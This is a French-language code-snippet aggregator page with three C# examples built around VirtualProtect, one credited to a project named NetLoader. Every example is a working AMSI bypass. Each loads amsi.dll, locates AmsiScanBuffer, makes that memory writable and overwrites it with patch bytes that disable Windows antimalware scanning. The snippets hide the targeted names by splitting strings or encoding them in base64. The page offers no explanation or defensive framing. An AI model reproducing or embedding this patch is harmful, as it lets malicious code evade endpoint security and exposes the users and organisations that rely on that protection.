WinLibBase.VirtualProtect C# (CSharp) Exemples de code

Exemple #1

0

Afficher le fichier

Fichier : Program.cs Projet : topotam/NetLoader

    private static void PathAnnsi(byte[] magicJuice)
    {
        try
        {
            Console.WriteLine("[+] Patching AM" + "SI ...");
            IntPtr lib  = WinLibBase.LoadLibrary("am" + "si.dll");
            IntPtr addr = WinLibBase.GetProcAddress(lib, "Am" + "siSca" + "nBuffer");

            WinLibBase.VirtualProtect(addr, (UIntPtr)magicJuice.Length, 0x40, out var oldProtect);

            Marshal.Copy(magicJuice, 0, addr, magicJuice.Length);

            Console.WriteLine("[+] Patched!");
        }
        catch (Exception ex)
        {
            Console.WriteLine("[!] {0}", ex.Message);
            Console.WriteLine("[!] {0}", ex.InnerException);
        }
    }

Exemple #2

0

Afficher le fichier

    private static void MoveLifeAhead(bool BigBoy = false)
    {
        try
        {
            var    fooBar          = WinLibBase.LoadLibrary(Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));
            IntPtr addr            = WinLibBase.GetProcAddress(fooBar, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));
            uint   magicRastaValue = 0x40;

            uint someNumber = 0;

            if (System.Environment.Is64BitOperatingSystem)
            {
                var bigBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };

                Console.WriteLine("[+] Patching...");

                WinLibBase.VirtualProtect(addr, (UIntPtr)bigBoyBytes.Length, magicRastaValue, out someNumber);

                CopyData(bigBoyBytes, addr);

                Console.WriteLine("[+] Patched!");
            }
            else
            {
                var smallBoyBytes = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

                Console.WriteLine("[+] Patching ...");

                WinLibBase.VirtualProtect(addr, (UIntPtr)smallBoyBytes.Length, magicRastaValue, out someNumber);

                CopyData(smallBoyBytes, addr);

                Console.WriteLine("[+] Patched!");
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine("[!] {0}", ex.Message);
        }
    }

Exemple #3

0

Afficher le fichier

    private static void MoveLifeAhead(bool BigBoy = false)
    {
        try
        {
            var    fooBar = WinLibBase.LoadLibrary("am" + "si.dll");
            IntPtr addr   = WinLibBase.GetProcAddress(fooBar, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));

            if (BigBoy)
            {
                Console.WriteLine("[+] Patching...");

                uint someNumber = 0;

                WinLibBase.VirtualProtect(addr, (UIntPtr) new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }.Length, 0x40, out someNumber);

                Marshal.Copy(new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }, 0, addr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }.Length);

                Console.WriteLine("[+] Patched!");
            }
            else
            {
                Console.WriteLine("[+] Patching ...");

                uint someNumber = 0;

                WinLibBase.VirtualProtect(addr, (UIntPtr) new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }.Length, 0x40, out someNumber);

                Marshal.Copy(new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }, 0, addr, new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }.Length);

                Console.WriteLine("[+] Patched!");
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine("[!] {0}", ex.Message);
            Console.WriteLine("[!] {0}", ex.InnerException);
        }
    }

C# (CSharp) WinLibBase.VirtualProtect Exemples